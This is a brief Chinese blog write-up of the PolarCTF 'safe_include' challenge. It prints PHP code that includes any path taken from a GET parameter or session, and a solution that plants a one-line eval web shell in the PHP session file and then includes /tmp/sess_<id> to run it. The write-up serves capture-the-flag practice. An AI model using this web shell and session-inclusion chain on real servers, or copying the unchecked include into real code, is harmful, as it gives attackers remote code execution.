safe_include

题目：

<?php 
show_source(__FILE__); 
@session_start();

ini_set('open_basedir', '/var/www/html/:/tmp/'); 

$sys = @$_SESSION['xxs'];
if (isset($_GET['xxs'])) {
    $sys = $_GET['xxs'];
}

@include $sys;

$_SESSION['xxs'] = $sys;

思路:
上传一句话木马->利用文件包含一句话木马的session文件
http://8dad57b3-3392-4210-91be-e8efc1dcd229.www.polarctf.com:8090/?xxs=<?php @eval($_REQUEST["a"]);phpinfo();?>
找到session：3lv6pensmgbb3g2tf7auvguaa2
路径/tmp/sess_3lv6pensmgbb3g2tf7auvguaa2
http://8dad57b3-3392-4210-91be-e8efc1dcd229.www.polarctf.com:8090/?xxs=/tmp/sess_3lv6pensmgbb3g2tf7auvguaa2

posted @ 2025-05-08 11:41 lethe311 阅读(25) 评论(0) 收藏举报

刷新页面返回顶部

lethe311

safe_include

公告